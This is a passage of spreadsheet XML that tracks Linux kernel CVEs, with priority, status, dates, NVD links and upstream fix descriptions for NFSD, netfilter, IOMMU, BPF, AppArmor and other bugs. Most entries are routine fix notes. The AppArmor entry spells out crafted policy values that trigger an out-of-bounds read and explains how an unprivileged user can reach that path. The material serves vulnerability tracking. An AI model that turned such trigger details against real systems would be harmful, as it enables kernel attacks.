      <c r="S604" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSD: Release the export reference when reaping open stateids
nfs4_put_stid() releases the svc_export tracked in
nfs4_stid.sc_export, but free_ol_stateid_reaplist() frees open and
lock stateids by calling -&gt;sc_free() directly, bypassing that path.
An open stateid takes an sc_export reference in nfs4_open() and a
lock stateid takes its own in init_lock_stateid(); both reach
free_ol_stateid_reaplist() through their normal teardown, the open
stateid via release_open_stateid() and the lock stateid via
nfsd4_release_lockowner(), each through put_ol_stateid_locked().
The reference is therefore never dropped, pinning the export and
blocking unmount for the lifetime of the stateid.
Release sc_export in free_ol_stateid_reaplist() the way
nfs4_put_stid() does. -&gt;sc_free() runs once per stateid, and a
stateid reaches free_ol_stateid_reaplist() or nfs4_put_stid() but
never both, so the reference is dropped exactly once. Revoked
stateids reach this path with sc_export already cleared by
drop_stid_export(), so they are skipped rather than double-freed.
nfs4_put_stid() itself read sc_export before acquiring cl_lock.
drop_stid_export() clears that field and releases the reference
under cl_lock, so a concurrent revocation could drop the export in
the window between the read and the final put, releasing the same
reference twice. Read sc_export while cl_lock is held so the two
paths serialize and the reference is released exactly once.</t>
        </is>
      </c>
      <c r="T604" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90236</t>
        </is>
      </c>
    </row>
    <row r="605">
      <c r="A605" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B605" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C605" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90237</t>
        </is>
      </c>
      <c r="D605" s="5" t="inlineStr"/>
      <c r="E605" s="5" t="inlineStr"/>
      <c r="F605" s="5" t="inlineStr"/>
      <c r="G605" s="5" t="inlineStr"/>
      <c r="H605" s="5" t="inlineStr"/>
      <c r="I605" s="5" t="inlineStr"/>
      <c r="J605" s="5" t="inlineStr"/>
      <c r="K605" s="5" t="inlineStr"/>
      <c r="L605" s="5" t="inlineStr"/>
      <c r="M605" s="5" t="inlineStr"/>
      <c r="N605" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O605" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P605" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q605" s="5" t="inlineStr"/>
      <c r="R605" s="5" t="inlineStr"/>
      <c r="S605" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: nft_ct: move custom expectation support to helper
Originally, the ct expectation support called nf_ct_helper_ext_add() for
confirmed conntracks, which is invalid, triggering a splat. This was
fixed by commit 1710eb913bdc ("netfilter: nft_ct: skip expectations for
confirmed conntrack") which restricted it to unconfirmed conntracks.
However, early insertion of expectations into the expectations list when
the conntrack is unconfirmed leads to stale entries pointing to the
wrong hlist_head through .pprev due to ct extension reallocation.
Commit 7c9664351980 ("netfilter: move nat hlist_head to nf_conn") moved
the nat hlist_head to nf_conn for this reason:
     1. ...
     2. When reallocation of extension area occurs we need to fixup the
        bysource hash head via hlist_replace_rcu.
I'd rather not increase the size of the struct nf_conn for this feature
has very limited scope: only one expectation can be created at a time
given expect_clash() will make nf_ct_expect_related() reports EBUSY.
For this reason, relax nf_ct_expect_related() not to drop packets in
case expectation creation fails, therefore, expectation creation becomes
best effort.
To address this issue, add an internal ct helper and attach it to the
conntrack entry to streamline the custom ct expectation support with
existing ct helpers.
Expose a new nf_conntrack_helper_release() function to release the
internal helper that is allocated and attached to the conntrack entry to
create the custom expectations. The nft_ct module removal always waits
for rcu grace period, then the NULL helper callback is observed after
this.
This patch also restricts the creation of expectations to different
helpers other than this custom helper that is created for this type of
expectations.</t>
        </is>
      </c>
      <c r="T605" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90237</t>
        </is>
      </c>
    </row>
    <row r="606">
      <c r="A606" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B606" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C606" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90238</t>
        </is>
      </c>
      <c r="D606" s="5" t="inlineStr"/>
      <c r="E606" s="5" t="inlineStr"/>
      <c r="F606" s="5" t="inlineStr"/>
      <c r="G606" s="5" t="inlineStr"/>
      <c r="H606" s="5" t="inlineStr"/>
      <c r="I606" s="5" t="inlineStr"/>
      <c r="J606" s="5" t="inlineStr"/>
      <c r="K606" s="5" t="inlineStr"/>
      <c r="L606" s="5" t="inlineStr"/>
      <c r="M606" s="5" t="inlineStr"/>
      <c r="N606" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O606" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P606" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q606" s="5" t="inlineStr"/>
      <c r="R606" s="5" t="inlineStr"/>
      <c r="S606" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: amd: isp4: fix self-deadlock in isp4sd_pwron_and_init() error path
isp4sd_pwron_and_init() holds ops_mutex via guard(mutex) and, on any
init failure, jumps to err_deinit and calls isp4sd_pwroff_and_deinit().
That helper takes the same ops_mutex, re-acquiring a non-recursive mutex
already held by the current thread, so any init failure deadlocks.
Unwind the error path in stages instead, releasing only what each
failure point acquired. This also avoids the issues that an
unconditional teardown would hit at the earlier failures, such as a
runtime-PM underflow from pm_runtime_resume_and_get() and MMIO access
while the device is unpowered.</t>
        </is>
      </c>
      <c r="T606" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90238</t>
        </is>
      </c>
    </row>
    <row r="607">
      <c r="A607" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B607" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C607" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90239</t>
        </is>
      </c>
      <c r="D607" s="5" t="inlineStr"/>
      <c r="E607" s="5" t="inlineStr"/>
      <c r="F607" s="5" t="inlineStr"/>
      <c r="G607" s="5" t="inlineStr"/>
      <c r="H607" s="5" t="inlineStr"/>
      <c r="I607" s="5" t="inlineStr"/>
      <c r="J607" s="5" t="inlineStr"/>
      <c r="K607" s="5" t="inlineStr"/>
      <c r="L607" s="5" t="inlineStr"/>
      <c r="M607" s="5" t="inlineStr"/>
      <c r="N607" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O607" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P607" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q607" s="5" t="inlineStr"/>
      <c r="R607" s="5" t="inlineStr"/>
      <c r="S607" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: amd: isp4: release partial allocations in isp4if_alloc_fw_gpumem()
isp4if_alloc_fw_gpumem() allocates several GPU memory pools in sequence.
If one of them fails, it jumps to error_no_memory and returns -ENOMEM
without releasing the pools that were already allocated, leaking them.
Release the already-allocated pools before returning. isp4if_gpu_mem_free()
is a no-op on pools that were not allocated, so calling
isp4if_dealloc_fw_gpumem() here safely frees exactly the pools that
succeeded.
isp4if_gpu_mem_free() previously logged an error for a NULL entry, which
is a normal case during partial-allocation cleanup, so make it silent.</t>
        </is>
      </c>
      <c r="T607" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90239</t>
        </is>
      </c>
    </row>
    <row r="608">
      <c r="A608" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B608" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C608" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90240</t>
        </is>
      </c>
      <c r="D608" s="5" t="inlineStr"/>
      <c r="E608" s="5" t="inlineStr"/>
      <c r="F608" s="5" t="inlineStr"/>
      <c r="G608" s="5" t="inlineStr"/>
      <c r="H608" s="5" t="inlineStr"/>
      <c r="I608" s="5" t="inlineStr"/>
      <c r="J608" s="5" t="inlineStr"/>
      <c r="K608" s="5" t="inlineStr"/>
      <c r="L608" s="5" t="inlineStr"/>
      <c r="M608" s="5" t="inlineStr"/>
      <c r="N608" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O608" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P608" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q608" s="5" t="inlineStr"/>
      <c r="R608" s="5" t="inlineStr"/>
      <c r="S608" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/vt-d: Flush context cache with correct SID when tearing down aliases
domain_context_clear_one() and device_pasid_table_teardown() are both
invoked once per DMA alias of a device. Each function locates the context
entry using the bus/devfn pair provided by the pci_for_each_dma_alias()
callback, then calls intel_context_flush_no_pasid(), which constructs a
device-selective context-cache invalidation from info-&gt;bus and
info-&gt;devfn (that is, always the requester ID of the device itself).
As a result, for every alias other than the device’s own RID, the context
entry that was just cleared in memory is never invalidated in the context
cache. Hardware may continue using that stale cached entry. In the
scalable-mode teardown path, intel_pasid_free_table() can then free the
PASID directory still referenced by that stale entry, allowing the IOMMU
to walk freed memory.
Fix this by passing the source ID of the entry being torn down to
intel_context_flush_no_pasid(), instead of deriving it from @info.</t>
        </is>
      </c>
      <c r="T608" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90240</t>
        </is>
      </c>
    </row>
    <row r="609">
      <c r="A609" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B609" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C609" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90241</t>
        </is>
      </c>
      <c r="D609" s="5" t="inlineStr"/>
      <c r="E609" s="5" t="inlineStr"/>
      <c r="F609" s="5" t="inlineStr"/>
      <c r="G609" s="5" t="inlineStr"/>
      <c r="H609" s="5" t="inlineStr"/>
      <c r="I609" s="5" t="inlineStr"/>
      <c r="J609" s="5" t="inlineStr"/>
      <c r="K609" s="5" t="inlineStr"/>
      <c r="L609" s="5" t="inlineStr"/>
      <c r="M609" s="5" t="inlineStr"/>
      <c r="N609" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O609" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P609" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q609" s="5" t="inlineStr"/>
      <c r="R609" s="5" t="inlineStr"/>
      <c r="S609" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/vt-d: Tear down scalable-mode context on probe failure
intel_pasid_setup_sm_context() walks a PCI device’s DMA aliases via
pci_for_each_dma_alias() and programs a scalable-mode context entry for
each RID. For a device with a dma_alias_mask, the callback is invoked
once for the device’s own RID and once for each alias bit, all with the
same pci_dev, so device_pasid_table_setup() runs for multiple RIDs.
pci_for_each_dma_alias() stops at the first callback error. Therefore, a
failure partway through the walk can leave context entries for already
processed RIDs present and still pointing to the device’s PASID table.
On this error path, intel_iommu_probe_device() currently jumps directly
to intel_pasid_free_table(), which frees the PASID table without
first tearing down those context entries. The IOMMU may then walk a
present context entry whose PASID table pointer references freed
memory.
intel_iommu_release_device() already performs teardown before freeing the
table. Apply the same ordering on the probe failure path.
device_pasid_table_teardown() safely handles RIDs that were never
programmed: iommu_context_addr() returns NULL when no context table has
been allocated, and clearing the Present bit of an already non-present
entry is a no-op. So unwind is safe for both the alias that failed and
any aliases not yet reached.</t>
        </is>
      </c>
      <c r="T609" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90241</t>
        </is>
      </c>
    </row>
    <row r="610">
      <c r="A610" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B610" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C610" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90242</t>
        </is>
      </c>
      <c r="D610" s="5" t="inlineStr"/>
      <c r="E610" s="5" t="inlineStr"/>
      <c r="F610" s="5" t="inlineStr"/>
      <c r="G610" s="5" t="inlineStr"/>
      <c r="H610" s="5" t="inlineStr"/>
      <c r="I610" s="5" t="inlineStr"/>
      <c r="J610" s="5" t="inlineStr"/>
      <c r="K610" s="5" t="inlineStr"/>
      <c r="L610" s="5" t="inlineStr"/>
      <c r="M610" s="5" t="inlineStr"/>
      <c r="N610" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O610" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P610" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q610" s="5" t="inlineStr"/>
      <c r="R610" s="5" t="inlineStr"/>
      <c r="S610" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/vt-d: Fix iopf_refcount leak on RID domain replacement
intel_iommu_attach_device() enables IOPF for the new domain but never
disables it for the old one.  device_block_translation(), called at the
start of the function, tears down translation but does not touch any IOPF
state; blocking_domain_attach_dev() has to call iopf_for_domain_remove()
explicitly before invoking it for exactly this reason.
identity_domain_attach_dev() has the same problem.  Its comment claims
that no PRI handling is needed because the device has been put in the
blocking state, but the blocking state and the IOPF reference count are
independent of each other.
As a result, replacing a domain that has an iopf_handler with another
domain at RID level leaks a reference in info-&gt;iopf_refcount.  The count
never drops back to zero, so iopf_queue_remove_device() is never called
and iommu_disable_pci_pri() triggers its WARN_ON(info-&gt;iopf_refcount)
when the device is released.
The PASID paths already handle this correctly by way of
iopf_for_domain_replace(); convert the two RID paths to do the same.
Using the replace helper rather than a bare remove keeps the enable
before the disable, so the reference count does not transiently reach
zero and evict the device from the IOPF queue.</t>
        </is>
      </c>
      <c r="T610" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90242</t>
        </is>
      </c>
    </row>
    <row r="611">
      <c r="A611" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B611" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C611" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90243</t>
        </is>
      </c>
      <c r="D611" s="5" t="inlineStr"/>
      <c r="E611" s="5" t="inlineStr"/>
      <c r="F611" s="5" t="inlineStr"/>
      <c r="G611" s="5" t="inlineStr"/>
      <c r="H611" s="5" t="inlineStr"/>
      <c r="I611" s="5" t="inlineStr"/>
      <c r="J611" s="5" t="inlineStr"/>
      <c r="K611" s="5" t="inlineStr"/>
      <c r="L611" s="5" t="inlineStr"/>
      <c r="M611" s="5" t="inlineStr"/>
      <c r="N611" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O611" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P611" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q611" s="5" t="inlineStr"/>
      <c r="R611" s="5" t="inlineStr"/>
      <c r="S611" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/vt-d: Clear Present bit before tearing down copied context entry
copied_context_tear_down() zeroes the 128-bit context entry with
context_clear_entry() while the Present bit is still set, and only then
issues the context-cache and IOTLB invalidations.  This leaves a window
in which hardware can fetch a torn entry, with some fields already zeroed
while Present is still set, leading to unpredictable behaviour or
spurious faults.  While x86 provides strong write ordering, the compiler
may reorder the writes to the two 64-bit halves of the entry, and the
hardware fetch is not guaranteed to be atomic with respect to multiple
CPU writes.
There is no cacheline flush before the invalidation either, so on an
IOMMU without coherent access to the context table the zeroed entry may
not be visible to hardware at the point the invalidation is submitted.
Apply the same ownership handshake described in the VT-d spec, Section
6.5.3.3 ("Guidance to Software for Invalidations"): clear only the Present
bit, flush it out to the IOMMU, perform the invalidations, and only then
zero the remainder of the entry.</t>
        </is>
      </c>
      <c r="T611" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90243</t>
        </is>
      </c>
    </row>
    <row r="612">
      <c r="A612" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B612" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C612" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90244</t>
        </is>
      </c>
      <c r="D612" s="5" t="inlineStr"/>
      <c r="E612" s="5" t="inlineStr"/>
      <c r="F612" s="5" t="inlineStr"/>
      <c r="G612" s="5" t="inlineStr"/>
      <c r="H612" s="5" t="inlineStr"/>
      <c r="I612" s="5" t="inlineStr"/>
      <c r="J612" s="5" t="inlineStr"/>
      <c r="K612" s="5" t="inlineStr"/>
      <c r="L612" s="5" t="inlineStr"/>
      <c r="M612" s="5" t="inlineStr"/>
      <c r="N612" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O612" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P612" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q612" s="5" t="inlineStr"/>
      <c r="R612" s="5" t="inlineStr"/>
      <c r="S612" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/dma: Restore locking around msi_page_list
Unlike a group's default domain, which is always freshly allocated
and privately owned (iommu_group_alloc_default_domain()), VFIO type1's
legacy container merges any newly attached group into an existing
domain whenever their iommu_ops and cache-coherency enforcement match.
iommu_dma_get_msi_page() only asserts the caller's own group mutex is
held (iommu_group_mutex_assert()). On an IOMMU that publishes
IOMMU_RESV_SW_MSI, e.g. ARM SMMU, a VM with two such devices assigned
through the legacy container can have their guest drivers probe and
allocate MSIs in parallel; each host-side VFIO_DEVICE_SET_IRQS lands
on a different device fd and group mutex, but both devices' domains
are the same merged domain, so both can enter
iommu_dma_get_msi_page() concurrently and corrupt msi_page_list.
commit 288683c92b1a ("iommu: Make iommu_dma_prepare_msi() into a
generic operation") dropped the prior msi_prepare_lock on the
reasoning that "each iommu_domain is unique to a group," which holds
for default domains but not this VFIO type1 case. Restore the static
lock, since it's only guarding a corner case and will likely never
be contended.
iommufd avoids the equivalent problem by having its own callers
(iommufd_sw_map_msi()) take a ctx-wide sw_msi_lock before ever
reaching the shared list. VFIO type1 can't mirror that since it
dispatches to iommu_dma_sw_msi() which is outside VFIO's jurisdiction.</t>
        </is>
      </c>
      <c r="T612" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90244</t>
        </is>
      </c>
    </row>
    <row r="613">
      <c r="A613" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B613" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C613" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90245</t>
        </is>
      </c>
      <c r="D613" s="5" t="inlineStr"/>
      <c r="E613" s="5" t="inlineStr"/>
      <c r="F613" s="5" t="inlineStr"/>
      <c r="G613" s="5" t="inlineStr"/>
      <c r="H613" s="5" t="inlineStr"/>
      <c r="I613" s="5" t="inlineStr"/>
      <c r="J613" s="5" t="inlineStr"/>
      <c r="K613" s="5" t="inlineStr"/>
      <c r="L613" s="5" t="inlineStr"/>
      <c r="M613" s="5" t="inlineStr"/>
      <c r="N613" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O613" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P613" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q613" s="5" t="inlineStr"/>
      <c r="R613" s="5" t="inlineStr"/>
      <c r="S613" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fbdev: kyro: Validate overlay viewport coordinates
The overlay viewport end coordinates are computed from the viewport
origin and dimensions using 32-bit unsigned arithmetic. Large input
values can cause these calculations to wrap around before the resulting
coordinates are passed to SetOverlayViewPort().
SetOverlayViewPort() packs the viewport coordinates into 16-bit
register fields. The X coordinates are additionally adjusted by +2
and +1 before being written. Validate the coordinate calculations
for 32-bit wraparound and ensure that the adjusted coordinates fit
within their 16-bit register fields before calling
SetOverlayViewPort().
Found by Linux Verification Center (linuxtesting.org) with SVACE.</t>
        </is>
      </c>
      <c r="T613" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90245</t>
        </is>
      </c>
    </row>
    <row r="614">
      <c r="A614" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B614" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C614" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90246</t>
        </is>
      </c>
      <c r="D614" s="5" t="inlineStr"/>
      <c r="E614" s="5" t="inlineStr"/>
      <c r="F614" s="5" t="inlineStr"/>
      <c r="G614" s="5" t="inlineStr"/>
      <c r="H614" s="5" t="inlineStr"/>
      <c r="I614" s="5" t="inlineStr"/>
      <c r="J614" s="5" t="inlineStr"/>
      <c r="K614" s="5" t="inlineStr"/>
      <c r="L614" s="5" t="inlineStr"/>
      <c r="M614" s="5" t="inlineStr"/>
      <c r="N614" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O614" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P614" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q614" s="5" t="inlineStr"/>
      <c r="R614" s="5" t="inlineStr"/>
      <c r="S614" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
apparmor: fix integer overflow in verify_tags() bounds check
verify_tags() validates the tagset table unpacked from a policy blob.
For each set it reads a count and checks that advancing the index by
that count stays inside sets.table[]:
	u32 cnt = tags-&gt;sets.table[i];
	if (i+cnt &gt;= tags-&gt;sets.size) {
i, cnt and sets.size are all u32, so i+cnt is evaluated modulo 2^32.
sets.table[] is filled by unpack_tagsets() with aa_unpack_u32(), so
every entry is a raw unbounded 32-bit word taken from the policy blob,
and verify_tags() is the function that is supposed to validate it.  A
count close to U32_MAX makes the sum wrap to a small value, the guard
passes, and the inner loop then walks sets.table[++i] past the end of
the kcalloc(size, sizeof(u32)) allocation.
Note that sets.size is bounded by 65535, because unpack_tagsets() reads
it with aa_unpack_array() as a u16, so the wrap cannot be reached by
growing the table; it is reached purely through the attacker-supplied
count.
With sets.size = 2 and sets.table = { 0, 0xffffffff }:
  i = 0: cnt = 0, guard 0 + 0 &gt;= 2 is false, inner loop does not run
  i = 1: cnt = 0xffffffff, guard (1 + 0xffffffff) mod 2^32 == 0 &gt;= 2 is
         false, so the guard is bypassed and the inner loop reads
         sets.table[2] -- one element past a two element allocation
The walk continues until an out-of-bounds value happens to be &gt;=
hdrs.size or the access faults, so a crafted policy yields an
out-of-bounds read on the policy load path
(aa_replace_profiles -&gt; aa_unpack -&gt; unpack_policydb -&gt; unpack_tags -&gt;
verify_tags).  unpack_tags() runs before the perms and DFA tables are
unpacked, so no other table needs to be well formed to reach it.
Policy load is gated by aa_may_manage_policy(), which checks
CAP_MAC_ADMIN relative to the subject's own user namespace rather than
the init user namespace, so with the default
unprivileged_userns_apparmor_policy=1 the path is reachable from an
unprivileged task in a matched-level nested namespace, not only by a
globally privileged one.
Perform the addition in u64 so that it cannot wrap, restoring the
intended i + cnt &lt; sets.size guarantee.</t>
        </is>
      </c>
      <c r="T614" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90246</t>
        </is>
      </c>
    </row>
    <row r="615">
      <c r="A615" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B615" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C615" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90247</t>
        </is>
      </c>
      <c r="D615" s="5" t="inlineStr"/>
      <c r="E615" s="5" t="inlineStr"/>
      <c r="F615" s="5" t="inlineStr"/>
      <c r="G615" s="5" t="inlineStr"/>
      <c r="H615" s="5" t="inlineStr"/>
      <c r="I615" s="5" t="inlineStr"/>
      <c r="J615" s="5" t="inlineStr"/>
      <c r="K615" s="5" t="inlineStr"/>
      <c r="L615" s="5" t="inlineStr"/>
      <c r="M615" s="5" t="inlineStr"/>
      <c r="N615" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O615" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P615" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q615" s="5" t="inlineStr"/>
      <c r="R615" s="5" t="inlineStr"/>
      <c r="S615" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix mmap_lock leak in irq_work path
stack_map_get_build_id_offset() introduced a per-CPU irq_work to defer
mmap_read_unlock() from NMI context, and bpf_find_vma() later reused the
same mmap_unlock_work. Both callers only check whether the work is busy
before taking mmap_lock, so a nested caller can reuse the slot before the
first caller queues it. Two read locks may then be acquired while only one
deferred unlock runs, leaking a read lock and blocking exit_mmap().
Reserve the per-CPU slot before mmap_read_trylock(). Use the same wrapper
in stackmap and bpf_find_vma() so both callers release the reservation on
trylock failure. Keep rejecting the slot while the irq_work remains busy.
Release it after the irq_work callback unlocks the mm.</t>
        </is>
      </c>
      <c r="T615" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90247</t>
        </is>
      </c>
    </row>
    <row r="616">
      <c r="A616" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B616" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C616" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90248</t>
        </is>
      </c>
      <c r="D616" s="5" t="inlineStr"/>
      <c r="E616" s="5" t="inlineStr"/>
      <c r="F616" s="5" t="inlineStr"/>
      <c r="G616" s="5" t="inlineStr"/>
      <c r="H616" s="5" t="inlineStr"/>
      <c r="I616" s="5" t="inlineStr"/>
      <c r="J616" s="5" t="inlineStr"/>
      <c r="K616" s="5" t="inlineStr"/>
      <c r="L616" s="5" t="inlineStr"/>
      <c r="M616" s="5" t="inlineStr"/>
      <c r="N616" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O616" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P616" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q616" s="5" t="inlineStr"/>
      <c r="R616" s="5" t="inlineStr"/>
      <c r="S616" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: cls_api: fix teardown of an adopted proto on insert-race loss
In tc_new_tfilter() the create branch sets tp_created = 1 before calling
tcf_chain_tp_insert_unique(). When the caller loses the race (another
request inserted a proto at the same chain/prio first), insert_unique()
destroys the caller's own tp_new and returns the winner's proto with an
extra reference. tp_created was never cleared, so the loser's errout
path treated the winner's live proto as its own and called
tcf_chain_tp_delete_empty() on it, silently unlinking an active
classifier that the winning request already advertised via
RTM_NEWTFILTER.
Track the outcome of the insert step in a single tri-state variable so
each errout path reacts correctly:
- TP_NOT_CREATED: no proto created; pursue the old path.
- TP_CREATED: proto inserted successfully; same code path as before.
- TP_NOT_OWNED: New - lost the insert race; tp is another request's proto
  (chain ref already released by tp_new's destroy)
Both errout reactions are single expressions derived from the state.
This fix is motivated by the Sashiko's automated review of Patch
(net/sched: cls_api: Always acquire rtnl_lock when destroying locked
classifiers) [1][2]. The review identified the silent-unlink behaviour of
an adopted proto's teardown when a request loses the
tcf_chain_tp_insert_unique() race.
[1] https://sashiko.dev/#/patchset/20260801125632.360365-1-jhs%40mojatatu.com
[2] https://netdev-ai.bots.linux.dev/sashiko/#/patchset/20260801125632.360365-1-jhs%40mojatatu.com</t>
        </is>
      </c>
      <c r="T616" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90248</t>
        </is>
      </c>
    </row>
    <row r="617">
      <c r="A617" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B617" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C617" s="5" t="inlineStr">
        <is>
